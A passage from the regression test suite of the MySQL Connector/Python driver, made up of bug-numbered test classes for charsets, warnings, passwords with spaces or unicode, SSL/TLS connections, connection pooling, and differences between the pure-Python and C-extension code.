killer_cnx = connection.MySQLConnection(**tests.get_mysql_config())
time.sleep(1)
killer_cnx.cmd_query("KILL QUERY {0}".format(connection_id))
killer_cnx.close()
def sleepy_select(cnx):
"""Execute a SELECT statement which takes a while to complete"""
cur = cnx.cursor()
# Ugly query ahead!
stmt = "SELECT x1.*, x2.* from {table} as x1, {table} as x2".format(
table=self.table_name)
cur.execute(stmt)
# Save the error so we can check in the calling thread
cnx.test_error = None
try:
cur.fetchall()
except errors.Error as err:
cnx.test_error = err
cur.close()
worker = Thread(target=sleepy_select, args=[self.cnx])
killer = Thread(target=kill, args=[self.cnx.connection_id])
worker.start()
killer.start()
worker.join()
killer.join()
self.cnx.close()
self.assertTrue(isinstance(self.cnx.test_error, errors.DatabaseError))
self.assertEqual(str(self.cnx.test_error),
"1317 (70100): Query execution was interrupted")
class BugOra21535573(tests.MySQLConnectorTests):
"""BUG#21535573: SEGFAULT WHEN TRY TO SELECT GBK DATA WITH C-EXTENSION
"""
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
for charset in ('gbk', 'sjis', 'big5'):
tablename = charset + 'test'
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(tablename))
cnx.close()
def _test_charset(self, charset, data):
config = tests.get_mysql_config()
config['charset'] = charset
config['use_unicode'] = True
self.cnx = self.cnx.__class__(**config)
tablename = charset + 'test'
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(tablename))
if PY2:
column = data.encode(charset)
else:
column = data
table = (
"CREATE TABLE {table} ("
" {col} INT AUTO_INCREMENT KEY, "
"c1 VARCHAR(40)"
") CHARACTER SET '{charset}'"
).format(table=tablename, charset=charset, col=column)
cur.execute(table)
self.cnx.commit()
cur.execute("TRUNCATE {0}".format(tablename))
self.cnx.commit()
insert = "INSERT INTO {0} (c1) VALUES (%s)".format(tablename)
cur.execute(insert, (data,))
self.cnx.commit()
cur.execute("SELECT * FROM {0}".format(tablename))
for row in cur:
self.assertEqual(data, row[1])
cur.close()
self.cnx.close()
@foreach_cnx()
def test_gbk(self):
self._test_charset('gbk', u'海豚')
@foreach_cnx()
def test_sjis(self):
self._test_charset('sjis', u'シイラ')
@foreach_cnx()
def test_big5(self):
self._test_charset('big5', u'皿')
class BugOra21536507(tests.MySQLConnectorTests):
"""BUG#21536507:C/PYTHON BEHAVIOR NOT PROPER WHEN RAISE_ON_WARNINGS=TRUE
"""
@cnx_config(raw=False, get_warnings=True, raise_on_warnings=True)
@foreach_cnx()
def test_with_raw(self):
cur = self.cnx.cursor()
drop_stmt = "DROP TABLE IF EXISTS unknown"
self.assertRaises(errors.DatabaseError, cur.execute, drop_stmt)
exp = [('Note', 1051, "Unknown table 'myconnpy.unknown'")]
res = cur.fetchwarnings()
self.assertEqual('Note', res[0][0])
self.assertEqual(1051, res[0][1])
self.assertTrue(res[0][2].startswith("Unknown table"))
select_stmt = "SELECT 'a'+'b'"
cur.execute(select_stmt)
self.assertRaises(errors.DatabaseError, cur.fetchall)
if os.name != 'nt':
exp = [
('Warning', 1292, "Truncated incorrect DOUBLE value: 'a'"),
('Warning', 1292, "Truncated incorrect DOUBLE value: 'b'"),
]
else:
exp = [
('Warning', 1292, "Truncated incorrect DOUBLE value: 'b'"),
('Warning', 1292, "Truncated incorrect DOUBLE value: 'a'"),
]
self.assertEqual(exp, cur.fetchwarnings())
try:
cur.close()
except errors.InternalError as exc:
self.fail("Closing cursor failed with: %s" % str(exc))
class BugOra21420633(tests.MySQLConnectorTests):
"""BUG#21420633: CEXTENSION CRASHES WHILE FETCHING LOTS OF NULL VALUES
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.tbl = 'Bug21420633'
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = ("CREATE TABLE {0} (id INT, dept VARCHAR(5)) "
"DEFAULT CHARSET latin1".format(self.tbl))
cur.execute(create)
cur.close()
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.close()
cnx.close()
@foreach_cnx()
def test_null(self):
cur = self.cnx.cursor()
sql = "INSERT INTO {0} VALUES(%s, %s)".format(self.tbl)
data = [(i, None) for i in range(10000)]
cur.executemany(sql, data)
cur.close()
cur = self.cnx.cursor(named_tuple=True)
cur.execute("SELECT * FROM {0}".format(self.tbl))
res = cur.fetchall()
cur.close()
class BugOra21492428(tests.MySQLConnectorTests):
"""BUG#21492428: CONNECT FAILS WHEN PASSWORD STARTS OR ENDS WITH SPACES
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cursor = self.cnx.cursor()
if config['unix_socket'] and os.name != 'nt':
self.host = 'localhost'
else:
self.host = config['host']
grant = u"CREATE USER '{user}'@'{host}' IDENTIFIED BY '{password}'"
self._credentials = [
('ABCD', ' XYZ'),
('PQRS', ' 1 2 3 '),
('XYZ1', 'XYZ123 '),
('A B C D', ' ppppp '),
]
if self.cnx.get_server_version() > (5, 6):
self._credentials += [
(' PQRSWITHSPACE', ' 1 2 3 '),
('XYZ1WITHSPACE ', 'XYZ123 '),
(' S P A C E D ', ' ppppp '),
]
for user, password in self._credentials:
self.cursor.execute(grant.format(
user=user, host=self.host, password=password))
def tearDown(self):
for user, password in self._credentials:
self.cursor.execute(u"DROP USER '{user}'@'{host}'".format(
user=user, host=self.host))
def test_password_with_spaces(self):
config = tests.get_mysql_config()
for user, password in self._credentials:
config['user'] = user
config['password'] = password
config['database'] = None
try:
cnx = connection.MySQLConnection(**config)
except errors.ProgrammingError:
self.fail('Failed using password with spaces for user %s' % user)
else:
cnx.close()
class BugOra21476495(tests.MySQLConnectorTests):
"""Bug 21476495 - CHARSET VALUE REMAINS INVALID AFTER FAILED
SET_CHARSET_COLLATION() CALL
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
def test_bad_set_charset_number(self):
old_val = self.cnx._charset_id
self.assertRaises(mysql.connector.Error,
self.cnx.set_charset_collation, 19999)
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cursor = cnx.cursor(raw="true",buffered="true")
cursor.execute("SHOW VARIABLES LIKE 'character_set_connection'")
row = cursor.fetchone()
self.assertEqual(row[1], u"utf8mb4")
cursor.close()
self.assertEqual(self.cnx._charset_id, old_val)
class BugOra21477493(tests.MySQLConnectorTests):
"""Bug 21477493 - EXECUTEMANY() API WITH INSERT INTO .. SELECT STATEMENT
RETURNS INTERFACEERROR
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
cursor = self.cnx.cursor()
cursor.execute("DROP TABLE IF EXISTS fun1")
cursor.execute("CREATE TABLE fun1(a CHAR(50), b INT)")
data=[('A',1),('B',2)]
cursor.executemany("INSERT INTO fun1 (a, b) VALUES (%s, %s)",data)
cursor.close()
def tearDown(self):
cursor = self.cnx.cursor()
cursor.execute("DROP TABLE IF EXISTS fun1")
cursor.close()
def test_insert_into_select_type1(self):
data = [('A',1),('B',2)]
cursor = self.cnx.cursor()
cursor.executemany("INSERT INTO fun1 SELECT CONCAT('VALUES', %s), "
"b + %s FROM fun1", data)
cursor.close()
cursor = self.cnx.cursor()
cursor.execute("SELECT * FROM fun1")
self.assertEqual(8, len(cursor.fetchall()))
def test_insert_into_select_type2(self):
data = [('A',1),('B',2)]
cursor = self.cnx.cursor()
cursor.executemany("INSERT INTO fun1 SELECT CONCAT('VALUES(ab, cd)',"
"%s), b + %s FROM fun1", data)
cursor.close()
cursor = self.cnx.cursor()
cursor.execute("SELECT * FROM fun1")
self.assertEqual(8, len(cursor.fetchall()))
def test_insert_into_select_type3(self):
config = tests.get_mysql_config()
data = [('A',1),('B',2)]
cursor = self.cnx.cursor()
cursor.executemany("INSERT INTO `{0}`.`fun1` SELECT CONCAT('"
"VALUES(ab, cd)', %s), b + %s FROM fun1"
"".format(config["database"]), data)
cursor.close()
cursor = self.cnx.cursor()
cursor.execute("SELECT * FROM fun1")
self.assertEqual(8, len(cursor.fetchall()))
class BugOra21492815(tests.MySQLConnectorTests):
"""BUG#21492815: CALLPROC() HANGS WHEN CONSUME_RESULTS=TRUE
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.proc1 = 'Bug20834643'
self.proc2 = 'Bug20834643_1'
cur.execute("DROP PROCEDURE IF EXISTS {0}".format(self.proc1))
create = ("CREATE PROCEDURE {0}() BEGIN SELECT 1234; "
"END".format(self.proc1))
cur.execute(create)
cur.execute("DROP PROCEDURE IF EXISTS {0}".format(self.proc2))
create = ("CREATE PROCEDURE {0}() BEGIN SELECT 9876; "
"SELECT CONCAT('','abcd'); END".format(self.proc2))
cur.execute(create)
cur.close()
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP PROCEDURE IF EXISTS {0}".format(self.proc1))
cur.execute("DROP PROCEDURE IF EXISTS {0}".format(self.proc2))
cur.close()
cnx.close()
@cnx_config(consume_results=True, raw=True)
@foreach_cnx()
def test_set(self):
cur = self.cnx.cursor()
cur.callproc(self.proc1)
self.assertEqual((bytearray(b'1234'),),
next(cur.stored_results()).fetchone())
cur.callproc(self.proc2)
exp = [[(bytearray(b'9876'),)], [(bytearray(b'abcd'),)]]
results = []
for result in cur.stored_results():
results.append(result.fetchall())
self.assertEqual(exp, results)
cur.close()
@cnx_config(consume_results=True, raw=False)
@foreach_cnx()
def test_set(self):
cur = self.cnx.cursor()
cur.callproc(self.proc1)
self.assertEqual((1234,),
next(cur.stored_results()).fetchone())
cur.callproc(self.proc2)
exp = [[(9876,)], [('abcd',)]]
results = []
for result in cur.stored_results():
results.append(result.fetchall())
self.assertEqual(exp, results)
cur.close()
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
class BugOra21656282(tests.MySQLConnectorTests):
"""BUG#21656282: CONNECT FAILURE WITH C-EXT WHEN PASSWORD CONTAINS UNICODE
CHARACTER
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = CMySQLConnection(**config)
self.host = '127.0.0.1' if config['unix_socket'] and os.name != 'nt' \
else config['host']
self.user = 'unicode_user'
self.password = u'步'
# Use utf8mb4 character set
self.cnx.cmd_query("SET character_set_server='utf8mb4'")
# Drop user if exists
self._drop_user(self.host, self.user)
# Create the user with unicode password
create_user = (u"CREATE USER '{user}'@'{host}' IDENTIFIED BY "
u"'{password}'")
self.cnx.cmd_query(create_user.format(user=self.user, host=self.host,
password=self.password))
# Grant all to new user on database
grant = "GRANT ALL ON {database}.* TO '{user}'@'{host}'"
self.cnx.cmd_query(grant.format(database=config['database'],
user=self.user, host=self.host))
def tearDown(self):
self._drop_user(self.host, self.user)
def _drop_user(self, host, user):
try:
drop_user = "DROP USER '{user}'@'{host}'"
self.cnx.cmd_query(drop_user.format(user=user, host=host))
except errors.DatabaseError:
# It's OK when drop user fails
pass
def test_unicode_password(self):
config = tests.get_mysql_config()
config.pop('unix_socket')
config['user'] = self.user
config['password'] = self.password
try:
cnx = CMySQLConnection(**config)
except Exception as err:
self.fail('Failed using password with unicode characters: '
'e->{} t->{}'.format(err, type(err)))
else:
cnx.close()
class BugOra21530841(tests.MySQLConnectorTests):
"""BUG#21530841: SELECT FAILS WITH ILLEGAL RESULT SET ERROR WHEN COLUMN
COUNT IN RESULT > 4096
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.tbl = "Bug21530841"
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
def tearDown(self):
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cnx.close()
def test_big_column_count(self):
cur = self.cnx.cursor(raw=False, buffered=False)
# Create table with 512 Columns
table = "CREATE TABLE {0} ({1})".format(self.tbl,
", ".join(["c{0} INT".format(idx) for idx in range(512)]))
cur.execute(table)
# Insert 1 record
cur.execute("INSERT INTO {0}(c1) values (1) ".format(self.tbl))
self.cnx.commit()
# Select from 10 tables
query = "SELECT * FROM {0} WHERE a1.c1 > 0".format(
", ".join(["{0} a{1}".format(self.tbl, idx) for idx in range(10)]))
cur.execute(query)
cur.fetchone()
cur.close()
@unittest.skipIf(sys.version_info < (2, 7, 9),
"Python 2.7.9+ is required for SSL")
class BugOra25397650(tests.MySQLConnectorTests):
"""BUG#25397650: CERTIFICATE VALIDITY NOT VERIFIED
"""
def setUp(self):
self.config = tests.get_mysql_config().copy()
self.config.pop('unix_socket')
self.config['host'] = 'localhost'
self.ca = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_CA_cert.pem'))
self.ca_1 = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_CA_cert_1.pem'))
def _verify_cert(self, config):
# Test with a bad CA
config['ssl_ca'] = self.ca_1
config['ssl_verify_cert'] = True
self.assertRaises(errors.InterfaceError,
mysql.connector.connect, **config)
config['ssl_verify_cert'] = False
mysql.connector.connect(**config)
# Test with the correct CA
config['ssl_ca'] = self.ca
config['ssl_verify_cert'] = True
mysql.connector.connect(**config)
config['ssl_verify_cert'] = False
mysql.connector.connect(**config)
def test_pure_verify_server_certifcate(self):
config = self.config.copy()
config['use_pure'] = True
self._verify_cert(config)
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
def test_cext_verify_server_certifcate(self):
config = self.config.copy()
config['use_pure'] = False
self._verify_cert(config)
@unittest.skipIf(tests.MYSQL_VERSION < (5, 6, 39), "skip in older server")
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
class Bug28133321(tests.MySQLConnectorTests):
"""BUG#28133321: FIX INCORRECT COLUMNS NAMES REPRESENTING AGGREGATE
FUNCTIONS
"""
tbl = "BUG28133321"
def setUp(self):
create_table = ("CREATE TABLE {} ("
" dish_id INT(11) UNSIGNED AUTO_INCREMENT UNIQUE KEY,"
" category TEXT,"
" dish_name TEXT,"
" price FLOAT,"
" servings INT,"
" order_time TIME) CHARACTER SET utf8"
" COLLATE utf8_general_ci")
config = tests.get_mysql_config()
cnx = CMySQLConnection(**config)
try:
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
except:
pass
cnx.cmd_query(create_table.format(self.tbl))
cur = cnx.cursor(dictionary=True)
insert_stmt = ('INSERT INTO {} ('
' category, dish_name, price, servings, order_time'
') VALUES ("{{}}", "{{}}", {{}}, {{}}, "{{}}")'
).format(self.tbl)
values = [("dinner", "lassanya", 10.53, "2", "00:10"),
("dinner", "hamburger", 9.35, "1", "00:15"),
("dinner", "hamburger whit fries", 10.99, "2", "00:20"),
("dinner", "Pizza", 9.99, "4", "00:30"),
("dessert", "cheescake", 4.95, "1", "00:05"),
("dessert", "cheescake special", 5.95, "2", "00:05")]
for value in values:
cur.execute(insert_stmt.format(*value))
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = CMySQLConnection(**config)
try:
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
except:
pass
cnx.close()
def test_columns_name_are_not_bytearray(self):
sql_statement = ["SELECT",
" dish_id,",
" category,",
" JSON_OBJECTAGG(category, dish_name) as special,",
" JSON_ARRAYAGG(dish_name) as dishes,",
" GROUP_CONCAT(dish_name) as dishes2,",
" price,",
" servings,",
" ROUND(AVG(price)) AS round_avg_price,",
" AVG(price) AS avg_price,",
" MIN(price) AS min_price,",
" MAX(price) AS max_price,",
" MAX(order_time) AS preparation_time,",
" STD(servings) as deviation,",
" SUM(price) AS sum,",
" VARIANCE(price) AS var,",
" COUNT(DISTINCT servings) AS cd_servings,",
" COUNT(servings) AS c_servings ",
"FROM {} ",
"GROUP BY category"]
# Remove JSON functions when testing againsts server version < 5.7.22
# JSON_OBJECTAGG JSON_ARRAYAGG were introduced on 5.7.22
if tests.MYSQL_VERSION < (5, 7, 22):
sql_statement.pop(3)
sql_statement.pop(3)
sql_statement = "".join(sql_statement)
config = tests.get_mysql_config()
cnx = CMySQLConnection(**config)
cur = cnx.cursor(dictionary=True)
cur.execute(sql_statement.format(self.tbl))
rows = cur.fetchall()
col_names = [x[0] for x in cur.description]
for row in rows:
for col, val in row.items():
self.assertTrue(isinstance(col, STRING_TYPES),
"The columns name {} is not a string type"
"".format(col))
self.assertFalse(isinstance(col, (bytearray)),
"The columns name {} is a bytearray type"
"".format(col))
self.assertFalse(isinstance(val, (bytearray)),
"The value {} of column {} is a bytearray type"
"".format(val, col))
for col_name in col_names:
self.assertTrue(isinstance(col_name, STRING_TYPES),
"The columns name {} is not a string type"
"".format(col_name))
self.assertFalse(isinstance(col_name, (bytearray)),
"The columns name {} is a bytearray type"
"".format(col_name))
class BugOra21947091(tests.MySQLConnectorTests):
"""BUG#21947091: """
def setUp(self):
self.config = tests.get_mysql_config()
self.config.pop('unix_socket')
self.server = tests.MYSQL_SERVERS[0]
def _disable_ssl(self):
self.server.stop()
self.server.wait_down()
self.server.start(ssl_ca='', ssl_cert='', ssl_key='', ssl=0)
self.server.wait_up()
time.sleep(1)
def _enable_ssl(self):
self.server.stop()
self.server.wait_down()
self.server.start()
self.server.wait_up()
time.sleep(1)
def _verify_ssl(self, cnx, available=True):
cur = cnx.cursor()
cur.execute("SHOW STATUS LIKE 'Ssl_version'")
result = cur.fetchall()[0]
if available:
self.assertNotEqual(result[1], '')
else:
self.assertEqual(result[1], '')
def test_ssl_disabled_pure(self):
self.config['use_pure'] = True
self._test_ssl_modes()
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
def test_ssl_disabled_cext(self):
self.config['use_pure'] = False
self._test_ssl_modes()
def _test_ssl_modes(self):
config = self.config.copy()
# With SSL on server
# default
cnx = mysql.connector.connect(**config)
self._verify_ssl(cnx)
# disabled
config['ssl_disabled'] = True
cnx = mysql.connector.connect(**config)
self._verify_ssl(cnx, False)
self._disable_ssl()
config = self.config.copy()
config['ssl_ca'] = tests.SSL_CA
# Without SSL on server
try:
# default
cnx = mysql.connector.connect(**config)
self._verify_ssl(cnx, False)
# disabled
config['ssl_disabled'] = True
cnx = mysql.connector.connect(**config)
self._verify_ssl(cnx, False)
finally:
self._enable_ssl()
class BugOra25589496(tests.MySQLConnectorTests):
"""BUG#25589496: COMMITS RELATED TO "BUG22529828" BROKE BINARY DATA
HANDLING FOR PYTHON 2.7
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.tbl = "Bug25589496"
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
def tearDown(self):
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cnx.close()
def test_insert_binary(self):
table = """
CREATE TABLE {0} (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`section` VARCHAR(50) NOT NULL,
`pickled` LONGBLOB NOT NULL
)
""".format(self.tbl)
cursor = self.cnx.cursor()
cursor.execute(table)
pickled = pickle.dumps({'a': 'b'}, pickle.HIGHEST_PROTOCOL)
add_row_q = "INSERT INTO {0} (section, pickled) " \
"VALUES (%(section)s, %(pickled)s)".format(self.tbl)
new_row = cursor.execute(add_row_q, {'section': 'foo',
'pickled': pickled})
self.cnx.commit()
self.assertEqual(1, cursor.lastrowid)
cursor.close()
class BugOra25383644(tests.MySQLConnectorTests):
"""BUG#25383644: LOST SERVER CONNECTION LEAKS POOLED CONNECTIONS
"""
def setUp(self):
self.sql = "SELECT * FROM dummy"
self.mysql_server = tests.MYSQL_SERVERS[0]
def run_test(self, cnxpool):
i = 2
while i > 0:
cnx = cnxpool.get_connection()
cur = cnx.cursor()
try:
self.mysql_server.stop()
self.mysql_server.wait_down()
cur.execute(self.sql)
except (mysql.connector.errors.OperationalError,
mysql.connector.errors.ProgrammingError,
mysql.connector.errors.DatabaseError):
try:
cur.close()
cnx.close()
except mysql.connector.errors.OperationalError:
pass
finally:
i -= 1
if not self.mysql_server.check_running():
self.mysql_server.start()
self.mysql_server.wait_up()
def test_pool_exhaustion_pure(self):
config = tests.get_mysql_config()
config["pool_size"] = 1
config["use_pure"] = True
config['pool_name'] = 'BugOra25383644-pure'
cnxpool = pooling.MySQLConnectionPool(**config)
self.run_test(cnxpool)
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
def test_pool_exhaustion_cext(self):
config = tests.get_mysql_config()
config["pool_size"] = 1
config["use_pure"] = False
config['pool_name'] = 'BugOra25383644-c-ext'
cnxpool = pooling.MySQLConnectionPool(**config)
self.run_test(cnxpool)
class BugOra25558885(tests.MySQLConnectorTests):
"""BUG#25558885: ERROR 2013 (LOST CONNECTION TO MYSQL SERVER) USING C
EXTENSIONS
"""
def setUp(self):
pass
def _long_query(self, config, cursor_class):
db_conn = mysql.connector.connect(**config)
cur = db_conn.cursor(cursor_class=cursor_class)
cur.execute("select sleep(15)")
cur.close()
db_conn.disconnect()
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
def test_cext_cnx(self):
config = tests.get_mysql_config()
config["use_pure"] = False
del config["connection_timeout"]
cursor_class = mysql.connector.cursor_cext.CMySQLCursorBufferedRaw
self._long_query(config, cursor_class)
def test_pure_cnx(self):
config = tests.get_mysql_config()
config["use_pure"] = True
del config["connection_timeout"]
cursor_class = mysql.connector.cursor.MySQLCursorBufferedRaw
self._long_query(config, cursor_class)
class BugOra22564149(tests.MySQLConnectorTests):
"""BUG#22564149: CMD_QUERY_ITER ERRONEOUSLY CALLS ".ENCODE('UTF8')" ON
BYTESTRINGS
"""
def setUp(self):
config = tests.get_mysql_config()
self.tbl = "BugOra22564149"
self.cnx = connection.MySQLConnection(**config)
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cnx.cmd_query("CREATE TABLE {0} (id INT, name VARCHAR(50))"
"".format(self.tbl))
def tearDown(self):
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cnx.close()
def test_cmd_query_iter(self):
stmt = (u"SELECT 1; INSERT INTO {0} VALUES (1, 'João'),(2, 'André'); "
u"SELECT 3")
results = []
for result in self.cnx.cmd_query_iter(
stmt.format(self.tbl).encode("utf-8")):
results.append(result)
if "columns" in result:
results.append(self.cnx.get_rows())
class BugOra24659561(tests.MySQLConnectorTests):
"""BUG#24659561: LOOKUPERROR: UNKNOWN ENCODING: UTF8MB4
"""
def setUp(self):
config = tests.get_mysql_config()
config["charset"] = "utf8mb4"
config["collation"] = "utf8mb4_general_ci"
self.tbl = "BugOra24659561"
self.cnx = connection.MySQLConnection(**config)
self.cur = self.cnx.cursor()
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cur.execute("CREATE TABLE {0} (id INT, name VARCHAR(100))"
"".format(self.tbl))
def tearDown(self):
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cur.close()
def test_executemany_utf8mb4(self):
self.cur.executemany(
"INSERT INTO {0} VALUES (%s, %s)".format(self.tbl),
[(1, "Nuno"), (2, "Amitabh"), (3, "Rafael")]
)
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
class BugOra27991948(tests.MySQLConnectorTests):
"""BUG#27991948: UNREAD_RESULT IS NOT UNSET AFTER INVOKE GET_ROWS ON C-EXT
"""
test_sql_single_result = "show variables like '%port%'"
cnx_cext = None
cnx_cext_raw = None
def setUp(self):
config_cext = tests.get_mysql_config()
config_cext["use_pure"] = False
self.cnx_cext = mysql.connector.connect(**config_cext)
def tearDown(self):
self.cnx_cext.close()
def test_automatically_set_of_unread_rows(self):
"""Test unread_rows is automatically set after fetchall()"""
# Test get all the rows and execute a query without invoke free_result
self.cnx_cext.cmd_query(self.test_sql_single_result)
unread_result = self.cnx_cext.unread_result
self.assertTrue(unread_result, "unread_rows is expected to be True")
_ = self.cnx_cext.get_rows()
unread_result = self.cnx_cext.unread_result
self.assertFalse(unread_result, "unread_rows was not set to False")
# Query execution must not raise InternalError: Unread result found
self.cnx_cext.cmd_query(self.test_sql_single_result)
_ = self.cnx_cext.get_rows()
# Test cursor fetchall
cur_cext = self.cnx_cext.cursor()
cur_cext.execute(self.test_sql_single_result)
unread_result = self.cnx_cext.unread_result
self.assertTrue(unread_result, "unread_rows is expected to be True")
_ = cur_cext.fetchall()
unread_result = self.cnx_cext.unread_result
self.assertFalse(unread_result, "unread_rows was not set to False")
# Query execution must not raise InternalError: Unread result found
cur_cext.execute(self.test_sql_single_result)
_ = cur_cext.fetchall()
cur_cext.close()
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 1),
"Collation utf8mb4_0900_ai_ci not available on 5.7.x")
class BugOra27277964(tests.MySQLConnectorTests):
"""BUG#27277964: NEW UTF8MB4 COLLATIONS NOT SUPPORTED
"""
def setUp(self):
config = tests.get_mysql_config()
config["charset"] = "utf8mb4"
config["collation"] = "utf8mb4_0900_ai_ci"
self.tbl = "BugOra27277964"
self.cnx = connection.MySQLConnection(**config)
self.cur = self.cnx.cursor()
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cur.execute("CREATE TABLE {0} (id INT, name VARCHAR(100))"
"".format(self.tbl))
def tearDown(self):
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cur.close()
def test_execute_utf8mb4_collation(self):
self.cur.execute("INSERT INTO {0} VALUES (1, 'Nuno')".format(self.tbl))
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 11),
"Not support for TLSv1.2 or not available by default")
class Bug26484601(tests.MySQLConnectorTests):
"""UNABLE TO CONNECT TO A MYSQL SERVER USING TLSV1.2"""
def try_connect(self, tls_version, expected_ssl_version):
config = tests.get_mysql_config().copy()
config['tls_versions'] = tls_version
config['ssl_ca'] = ''
cnx = connection.MySQLConnection(**config)
query = "SHOW STATUS LIKE 'ssl_version%'"
cur = cnx.cursor()
cur.execute(query)
res = cur.fetchall()
if isinstance(expected_ssl_version, tuple):
msg = ("Not using the expected or greater TLS version: {}, instead"
" the connection used: {}.")
# Get the version as tuple
server_tls = tuple([int(d) for d in
(res[0][1].split('v')[1].split("."))])
self.assertGreaterEqual(server_tls, expected_ssl_version,
msg.format(expected_ssl_version, res))
else:
msg = ("Not using the expected TLS version: {}, instead the "
"connection used: {}.")
self.assertEqual(res[0][1], expected_ssl_version,
msg.format(expected_ssl_version, res))
def test_get_connection_using_given_TLS_version(self):
"""Test connect using the given TLS version
The system variable tls_version determines which protocols the
server is permitted to use from those that are available (note#3).
+---------------+-----------------------+
| Variable_name | Value |
+---------------+-----------------------+
| tls_version | TLSv1,TLSv1.1,TLSv1.2 |
+---------------+-----------------------+
To restrict and permit only connections with a specific version, the
variable can be set with those specific versions that will be allowed,
changing the configuration file.
[mysqld]
tls_version=TLSv1.1,TLSv1.2
This test will take adventage of the fact that the connector can
request to use a defined version of TLS to test that the connector can
connect to the server using such version instead of changing the
configuration of the server that will imply the stoping and restarting
of the server incrementing the time to run the test. In addition the
test relay in the default value of the 'tls_version' variable is set to
'TLSv1,TLSv1.1,TLSv1.2' (note#2).
On this test a connection will be
attempted forcing to use a determined version of TLS, (all of them
must be successfully) finally making sure that the connection was done
using the given TLS_version using the ssl.version() method (note#3).
Notes:
1.- tls_version is only available on MySQL 5.7
2.- 5.6.39 does not support TLSv1.2 so for test will be skip. Currently
in 5.7.21 is set to default values TLSv1,TLSv1.1,TLSv1.2 same as in
8.0.11+. This test will be only run in such versions and above.
3.- The ssl.version() method returns the version of tls used in during
the connection, however the version returned using ssl.cipher() is
not correct on windows, only indicates the newer version supported.
"""
test_tls_versions = check_tls_versions_support(["TLSv1.1", "TLSv1.2"])
if not test_tls_versions:
self.fail("No TLS version to test: {}".format(test_tls_versions))
for tls_v_name in test_tls_versions:
self.try_connect([tls_v_name], tls_v_name)
def test_get_connection_using_servers_TLS_version(self):
"""Test connect using the servers default TLS version
The TLS version used during the secured connection is chosen by the
server at the time the ssl handshake is made if the connector does not
specifies any specific version to use. The default value of the
ssl_version is None, however this only mean to the connector that none
specific version will be chosen by the server when the ssl handshake
occurs.
"""
# The default value for the connector 'ssl_version' is None
# For the expected version, the server will use the latest version of
# TLS available "TLSv1.2" or newer.
tls_version = None
self.try_connect(tls_version, (1, 2))
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
class BugOra27650437(tests.MySQLConnectorTests):
"""BUG#27650437: DIFFERENCES PYTHON AND C-EXT FOR GET_ROW()/GET_ROWS()
"""
test_sql_single_result = "show variables like '%port%'"
cnx_pure = None
cnx_cext = None
cnx_pure_raw = None
cnx_cext_raw = None
def setUp(self):
config_pure = tests.get_mysql_config()
config_pure["use_pure"] = True
self.cnx_pure = mysql.connector.connect(**config_pure)
config_cext = tests.get_mysql_config()
config_cext["use_pure"] = False
self.cnx_cext = mysql.connector.connect(**config_cext)
config_pure_raw = tests.get_mysql_config()
config_pure_raw["use_pure"] = True
config_pure_raw["raw"] = True
self.cnx_pure_raw = mysql.connector.connect(**config_pure_raw)
config_cext_raw = tests.get_mysql_config()
config_cext_raw["use_pure"] = False
config_cext_raw["raw"] = True
self.cnx_cext_raw = mysql.connector.connect(**config_cext_raw)
def tearDown(self):
self.cnx_pure.close()
self.cnx_cext.close()
self.cnx_pure_raw.close()
self.cnx_cext_raw.close()
def test_get_row(self):
"""Test result from get_row is the same in pure and using c-ext"""
self.cnx_pure.cmd_query(self.test_sql_single_result)
res_pure = self.cnx_pure.get_row()
self.cnx_cext.cmd_query(self.test_sql_single_result)
res_cext = self.cnx_cext.get_row()
self.assertEqual(res_pure, res_cext, "Result using pure: {} differs"
"from c-ext result {}".format(res_pure, res_cext))
def test_get_rows(self):
